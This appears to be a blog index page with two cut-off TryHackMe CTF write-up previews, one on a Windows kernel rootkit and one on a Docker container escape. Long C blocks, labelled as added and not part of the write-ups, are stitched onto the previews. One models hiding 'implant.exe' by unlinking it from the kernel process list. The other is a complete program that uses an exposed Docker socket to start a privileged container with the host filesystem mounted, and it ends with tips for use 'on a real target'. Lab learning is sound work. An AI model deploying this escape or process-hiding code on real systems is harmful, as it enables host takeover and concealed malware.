Posts

Showing posts from May, 2026

TryHackMe - Kernel Blackout CTF

1. Script Explanation (rootkit.c)

Script:

    #include <ntddk.h>

    // Offsets for Windows 10 x64 (Version 19041 - THM Lab)
    #define LINKS_OFFSET 0x2e8 // ActiveProcessLinks
    #define NAME_OFFSET  0x450 // ImageFileName

    void DriverUnload(PDRIVER_OBJECT DriverObject) {
        UNREFERENCED_PARAMETER(DriverObject);
        DbgPrint("Driver Unloaded. Note: Hidden processes remain hidden!\n");
    }

    NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
        UNREFERENCED_PARAMETER(DriverObject);
        UNREFERENCED_PARAMETER(RegistryPath);

        // Start iterating from the System process
        PEPROCESS CurrentProcess = PsInitialSystemProcess;
        PLIST_ENTRY CurrentListEntry;
        char* imageName;
        BOOLEAN found = FALSE;

        DbgPrint("Searching for implant.exe to hide it...\n");

        // Loop through the process list (limit to 1000 to avoid hangs)
        for (int i = 0; i < 1000; i++) {
            imageName = (char*)CurrentProcess + NAME_OFFSET;
            // Check if this is our target process
            if (strstr(i...
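The excerpt stops at the search loop, so the part that actually hides the process is not shown. The following is an added user-mode model of that DKOM (Direct Kernel Object Manipulation) step, not the write-up's rootkit.c: it walks a circular ActiveProcessLinks-style list using the same offset arithmetic the driver uses, finds the entry whose ImageFileName matches, and unlinks it while leaving the entry pointing at itself so a later RemoveEntryList on process exit does not corrupt its neighbours. The FAKE_EPROCESS blob, its size, the process names and the demo_hide helper are assumptions chosen to mirror the lab's 19041 offsets; nothing here touches a real kernel.

```c
#include <stdio.h>
#include <string.h>

typedef struct _LIST_ENTRY { struct _LIST_ENTRY *Flink, *Blink; } LIST_ENTRY;

#define LINKS_OFFSET 0x2e8   /* ActiveProcessLinks on Win10 x64 19041 */
#define NAME_OFFSET  0x450   /* ImageFileName (15 chars + NUL) */

/* Assumption: an opaque blob standing in for EPROCESS; only the two
 * fields at the known offsets matter for the technique. */
typedef struct { unsigned char raw[0x500]; } FAKE_EPROCESS;

static LIST_ENTRY *links_of(FAKE_EPROCESS *p) { return (LIST_ENTRY *)((char *)p + LINKS_OFFSET); }
static char *name_of(FAKE_EPROCESS *p) { return (char *)p + NAME_OFFSET; }
/* CONTAINING_RECORD: from a LIST_ENTRY pointer back to the owning process block. */
static FAKE_EPROCESS *proc_of(LIST_ENTRY *e) { return (FAKE_EPROCESS *)((char *)e - LINKS_OFFSET); }

static void init_process(FAKE_EPROCESS *p, const char *name) {
    memset(p, 0, sizeof *p);
    strncpy(name_of(p), name, 15);
    links_of(p)->Flink = links_of(p)->Blink = links_of(p);
}

/* Append at the tail of the circular list headed by the System process. */
static void append_process(FAKE_EPROCESS *head, FAKE_EPROCESS *p) {
    LIST_ENTRY *h = links_of(head), *e = links_of(p), *last = h->Blink;
    e->Flink = h; e->Blink = last; last->Flink = e; h->Blink = e;
}

/* Walk exactly as the driver does: start at System, follow Flink, bounded at 1000. */
static FAKE_EPROCESS *find_process(FAKE_EPROCESS *system, const char *target) {
    FAKE_EPROCESS *cur = system;
    for (int i = 0; i < 1000; i++) {
        if (strstr(name_of(cur), target)) return cur;
        cur = proc_of(links_of(cur)->Flink);
        if (cur == system) break;          /* back at the head: full lap done */
    }
    return NULL;
}

static int count_visible(FAKE_EPROCESS *system) {
    int n = 0; FAKE_EPROCESS *cur = system;
    do { n++; cur = proc_of(links_of(cur)->Flink); } while (cur != system && n < 1000);
    return n;
}

/* The DKOM step: splice the entry out of the list, then point it at itself so
 * the kernel's own unlink on exit finds consistent pointers. The process keeps
 * running because the scheduler works from thread lists, not this one. */
static void hide_process(FAKE_EPROCESS *p) {
    LIST_ENTRY *e = links_of(p);
    e->Blink->Flink = e->Flink;
    e->Flink->Blink = e->Blink;
    e->Flink = e->Blink = e;
}

/* Builds a constructed four-entry list, hides `target`, and returns 1 only if the
 * target was found, is no longer reachable from System, and is self-linked. */
int demo_hide(const char *target) {
    static FAKE_EPROCESS procs[4];
    const char *names[4] = { "System", "svchost.exe", "implant.exe", "explorer.exe" };
    for (int i = 0; i < 4; i++) init_process(&procs[i], names[i]);
    for (int i = 1; i < 4; i++) append_process(&procs[0], &procs[i]);

    int before = count_visible(&procs[0]);
    FAKE_EPROCESS *victim = find_process(&procs[0], target);
    if (!victim) return 0;
    hide_process(victim);
    int after = count_visible(&procs[0]);
    return find_process(&procs[0], target) == NULL
        && after == before - 1
        && links_of(victim)->Flink == links_of(victim);
}

int main(void) {
    printf("implant.exe hidden from the list walk: %s\n", demo_hide("implant.exe") ? "yes" : "no");
    return 0;
}
```

The self-link at the end of hide_process is the detail that separates a stable rootkit from a crash: if the entry kept stale Flink/Blink values, the process exiting later would write into two blocks it is no longer adjacent to. This is also why tools that enumerate from the thread or handle table side (the basis of hidden-process detection) still see the process after the walk above no longer does.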

TryHackMe - Matryoshka CTF

Full Walkthrough — Matryoshka Containment Unit

Matryoshka Containment Unit is a Docker/container escape challenge that teaches:
- Docker socket abuse
- Privileged container escalation
- Shared volume abuse
- Remote code execution between containers
- Namespace escape to the host system

Below is the complete attack chain from the first flag to the host flag.

1. Initial Enumeration

You started inside the level1 container and performed basic Linux/container enumeration.

Commands:

    ls -la
    cat /proc/1/cgroup
    find / -perm -4000 2>/dev/null
    find / -name docker.sock 2>/dev/null

What you discovered:

.dockerenv
This indicated you were inside a Docker container.

/var/run/docker.sock
This was the key vulnerability. Docker socket exposure means:
- the container can communicate directly with the Docker daemon running on the host
- anyone with access to the socket can effectively control Docker on the host machine

This is one of the most dangerous Docker misconfigurations.

2. V...
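"Control Docker on the host" is concrete: the socket speaks the Docker Engine HTTP API, so a container that can open it does not need the docker CLI installed. The following is an added example, not part of the write-up, that talks to the daemon directly over AF_UNIX, asks it to create a container with the host's root filesystem bind-mounted at /host, and starts it. The image name (alpine), the command run inside the new container, and the /host mount point are assumptions for illustration; the request/response shapes (POST /containers/create with HostConfig.Binds, POST /containers/{id}/start, the 64-hex-character Id in the reply) are the real Engine API.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>

#define DOCKER_SOCK "/var/run/docker.sock"

/* Builds the Engine API call that creates a container with the host root
 * bind-mounted at /host. Image and Cmd are illustrative assumptions.
 * Returns the request length written into buf, or 0 if it did not fit. */
size_t build_create_request(char *buf, size_t cap, const char *image) {
    char body[512];
    int blen = snprintf(body, sizeof body,
        "{\"Image\":\"%s\",\"Cmd\":[\"sh\",\"-c\",\"id; ls /host\"],"
        "\"HostConfig\":{\"Binds\":[\"/:/host\"],\"Privileged\":true}}", image);
    if (blen < 0 || (size_t)blen >= sizeof body) return 0;
    int n = snprintf(buf, cap,
        "POST /containers/create HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n"
        "Content-Type: application/json\r\nContent-Length: %d\r\n\r\n%s", blen, body);
    if (n < 0 || (size_t)n >= cap) return 0;
    return (size_t)n;
}

/* Follow-up call that starts the container the daemon just created. */
size_t build_start_request(char *buf, size_t cap, const char *id) {
    int n = snprintf(buf, cap,
        "POST /containers/%s/start HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n"
        "Content-Length: 0\r\n\r\n", id);
    return (n < 0 || (size_t)n >= cap) ? 0 : (size_t)n;
}

/* Pulls the 64-hex-char "Id" out of the create response; returns 0 on failure
 * (for example the daemon answered with {"message":"No such image"}). */
int extract_container_id(const char *resp, char *id, size_t cap) {
    const char *p = strstr(resp, "\"Id\":\"");
    if (!p || cap < 65) return 0;
    p += 6;
    size_t i = 0;
    while (i < 64 && p[i] && p[i] != '"') { id[i] = p[i]; i++; }
    id[i] = '\0';
    return i == 64;
}

/* Sends one request over the Unix socket and reads the daemon's reply into out.
 * Returns bytes read, or -1 if the socket is missing or refuses the connection
 * (the case you hit when the socket is not actually exposed to this container). */
ssize_t docker_request(const char *sock_path, const char *req, size_t len, char *out, size_t cap) {
    int fd = socket(AF_UNIX, SOCK_STREAM, 0);
    if (fd < 0) return -1;
    struct sockaddr_un addr;
    memset(&addr, 0, sizeof addr);
    addr.sun_family = AF_UNIX;
    strncpy(addr.sun_path, sock_path, sizeof addr.sun_path - 1);
    if (connect(fd, (struct sockaddr *)&addr, sizeof addr) < 0) { close(fd); return -1; }
    if (write(fd, req, len) != (ssize_t)len) { close(fd); return -1; }
    ssize_t total = 0, r;
    while ((size_t)total < cap - 1 && (r = read(fd, out + total, cap - 1 - total)) > 0) total += r;
    out[total] = '\0';
    close(fd);
    return total;
}

int main(void) {
    char req[1024], resp[4096], id[65];
    size_t n = build_create_request(req, sizeof req, "alpine");
    if (docker_request(DOCKER_SOCK, req, n, resp, sizeof resp) < 0) {
        fprintf(stderr, "no reachable daemon at %s\n", DOCKER_SOCK);
        return 1;
    }
    if (!extract_container_id(resp, id, sizeof id)) {
        fprintf(stderr, "create failed:\n%s\n", resp);
        return 1;
    }
    n = build_start_request(req, sizeof req, id);
    docker_request(DOCKER_SOCK, req, n, resp, sizeof resp);
    printf("started %s with host / mounted at /host\n", id);
    return 0;
}
```

Two things worth checking before relying on this on a real target: the image named in the create request must already exist on the host (the daemon will not pull it for you, and the "No such image" reply is the usual first failure), and the output of the command inside the new container is collected with GET /containers/{id}/logs, which returns a multiplexed stream with 8-byte frame headers rather than plain text. The defensive reading is the same in both directions: a unix socket that is world-writable or bind-mounted into a workload gives that workload the host.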